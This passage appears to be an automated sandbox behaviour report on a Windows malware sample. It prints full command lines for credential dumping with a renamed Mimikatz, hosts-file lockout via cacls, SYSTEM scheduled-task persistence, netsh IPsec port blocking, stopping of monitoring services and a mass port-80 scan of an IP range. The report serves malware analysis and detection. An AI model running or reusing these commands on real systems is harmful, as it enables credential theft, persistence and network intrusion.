\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruznevtjd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language byuzvnr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language benegiqll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4340 cmd.exe 2664 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023cbc-5.dat nsis_installer_2 behavioral2/files/0x0011000000023ccd-12.dat nsis_installer_1 behavioral2/files/0x0011000000023ccd-12.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" byuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" byuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing byuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software lllgdyunt.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" byuzvnr.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2664 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1456 schtasks.exe 4228 schtasks.exe 468 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4020 2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4020 2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4956 byuzvnr.exe Token: SeDebugPrivilege 1160 byuzvnr.exe Token: SeDebugPrivilege 3184 vfshost.exe Token: SeDebugPrivilege 3692 lllgdyunt.exe Token: SeLockMemoryPrivilege 2300 uieubf.exe Token: SeLockMemoryPrivilege 2300 uieubf.exe Token: SeDebugPrivilege 4856 lllgdyunt.exe Token: SeDebugPrivilege 4940 lllgdyunt.exe Token: SeDebugPrivilege 1676 lllgdyunt.exe Token: SeDebugPrivilege 4792 lllgdyunt.exe Token: SeDebugPrivilege 3848 lllgdyunt.exe Token: SeDebugPrivilege 2568 lllgdyunt.exe Token: SeDebugPrivilege 4188 lllgdyunt.exe Token: SeDebugPrivilege 2812 lllgdyunt.exe Token: SeDebugPrivilege 3184 lllgdyunt.exe Token: SeDebugPrivilege 2908 lllgdyunt.exe Token: SeDebugPrivilege 2436 lllgdyunt.exe Token: SeDebugPrivilege 4804 lllgdyunt.exe Token: SeDebugPrivilege 2544 lllgdyunt.exe Token: SeDebugPrivilege 4940 lllgdyunt.exe Token: SeDebugPrivilege 2784 lllgdyunt.exe Token: SeDebugPrivilege 3224 lllgdyunt.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4020 2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe 4020 2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe 4956 byuzvnr.exe 4956 byuzvnr.exe 1160 byuzvnr.exe 1160 byuzvnr.exe 456 xohudmc.exe 3660 pujbqc.exe 3004 byuzvnr.exe 3004 byuzvnr.exe 3052 byuzvnr.exe 3052 byuzvnr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4020 wrote to memory of 4340 4020 2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe 83 PID 4020 wrote to memory of 4340 4020 2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe 83 PID 4020 wrote to memory of 4340 4020 2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe 83 PID 4340 wrote to memory of 2664 4340 cmd.exe 85 PID 4340 wrote to memory of 2664 4340 cmd.exe 85 PID 4340 wrote to memory of 2664 4340 cmd.exe 85 PID 4340 wrote to memory of 4956 4340 cmd.exe 86 PID 4340 wrote to memory of 4956 4340 cmd.exe 86 PID 4340 wrote to memory of 4956 4340 cmd.exe 86 PID 1160 wrote to memory of 4936 1160 byuzvnr.exe 88 PID 1160 wrote to memory of 4936 1160 byuzvnr.exe 88 PID 1160 wrote to memory of 4936 1160 byuzvnr.exe 88 PID 4936 wrote to memory of 3692 4936 cmd.exe 90 PID 4936 wrote to memory of 3692 4936 cmd.exe 90 PID 4936 wrote to memory of 3692 4936 cmd.exe 90 PID 4936 wrote to memory of 756 4936 cmd.exe 91 PID 4936 wrote to memory of 756 4936 cmd.exe 91 PID 4936 wrote to memory of 756 4936 cmd.exe 91 PID 4936 wrote to memory of 2320 4936 cmd.exe 92 PID 4936 wrote to memory of 2320 4936 cmd.exe 92 PID 4936 wrote to memory of 2320 4936 cmd.exe 92 PID 4936 wrote to memory of 3756 4936 cmd.exe 93 PID 4936 wrote to memory of 3756 4936 cmd.exe 93 PID 4936 wrote to memory of 3756 4936 cmd.exe 93 PID 4936 wrote to memory of 3224 4936 cmd.exe 94 PID 4936 wrote to memory of 3224 4936 cmd.exe 94 PID 4936 wrote to memory of 3224 4936 cmd.exe 94 PID 4936 wrote to memory of 400 4936 cmd.exe 95 PID 4936 wrote to memory of 400 4936 cmd.exe 95 PID 4936 wrote to memory of 400 4936 cmd.exe 95 PID 1160 wrote to memory of 5100 1160 byuzvnr.exe 97 PID 1160 wrote to memory of 5100 1160 byuzvnr.exe 97 PID 1160 wrote to memory of 5100 1160 byuzvnr.exe 97 PID 1160 wrote to memory of 4688 1160 byuzvnr.exe 99 PID 1160 wrote to memory of 4688 1160 byuzvnr.exe 99 PID 1160 wrote to memory of 4688 1160 byuzvnr.exe 99 PID 1160 wrote to memory of 3740 1160 byuzvnr.exe 101 PID 1160 wrote to memory of 3740 1160 byuzvnr.exe 101 PID 1160 wrote to memory of 3740 1160 byuzvnr.exe 101 PID 1160 wrote to memory of 3116 1160 byuzvnr.exe 116 PID 1160 wrote to memory of 3116 1160 byuzvnr.exe 116 PID 1160 wrote to memory of 3116 1160 byuzvnr.exe 116 PID 3116 wrote to memory of 4192 3116 cmd.exe 118 PID 3116 wrote to memory of 4192 3116 cmd.exe 118 PID 3116 wrote to memory of 4192 3116 cmd.exe 118 PID 4192 wrote to memory of 2612 4192 wpcap.exe 119 PID 4192 wrote to memory of 2612 4192 wpcap.exe 119 PID 4192 wrote to memory of 2612 4192 wpcap.exe 119 PID 2612 wrote to memory of 4304 2612 net.exe 121 PID 2612 wrote to memory of 4304 2612 net.exe 121 PID 2612 wrote to memory of 4304 2612 net.exe 121 PID 4192 wrote to memory of 4592 4192 wpcap.exe 122 PID 4192 wrote to memory of 4592 4192 wpcap.exe 122 PID 4192 wrote to memory of 4592 4192 wpcap.exe 122 PID 4592 wrote to memory of 2892 4592 net.exe 124 PID 4592 wrote to memory of 2892 4592 net.exe 124 PID 4592 wrote to memory of 2892 4592 net.exe 124 PID 4192 wrote to memory of 4120 4192 wpcap.exe 125 PID 4192 wrote to memory of 4120 4192 wpcap.exe 125 PID 4192 wrote to memory of 4120 4192 wpcap.exe 125 PID 4120 wrote to memory of 232 4120 net.exe 127 PID 4120 wrote to memory of 232 4120 net.exe 127 PID 4120 wrote to memory of 232 4120 net.exe 127 PID 4192 wrote to memory of 1368 4192 wpcap.exe 128
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2100
-
C:\Windows\TEMP\nqazjegtg\uieubf.exe"C:\Windows\TEMP\nqazjegtg\uieubf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\klhnlzly\byuzvnr.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2664
-
-
C:\Windows\klhnlzly\byuzvnr.exeC:\Windows\klhnlzly\byuzvnr.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4956
-
-
-
C:\Windows\klhnlzly\byuzvnr.exeC:\Windows\klhnlzly\byuzvnr.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3692
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2320
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3224
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:400
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5100
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4688
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3740
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exeC:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4304
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2892
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:232
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1368 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1164
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2544
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1848 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1520
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3692 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4216
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\hgpuenbvt\lzvztyutv\Scant.txt2⤵PID:3224
-
C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exeC:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\hgpuenbvt\lzvztyutv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\hgpuenbvt\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4688 -
C:\Windows\hgpuenbvt\Corporate\vfshost.exeC:\Windows\hgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zrhlvlrlm" /ru system /tr "cmd /c C:\Windows\ime\byuzvnr.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4184 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zrhlvlrlm" /ru system /tr "cmd /c C:\Windows\ime\byuzvnr.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dlttkgzdu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:748 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dlttkgzdu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yyqkeetlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nqazjegtg\uieubf.exe /p everyone:F"2⤵PID:3168
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yyqkeetlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nqazjegtg\uieubf.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1456
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2956
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5076
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3376
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2492
-
-
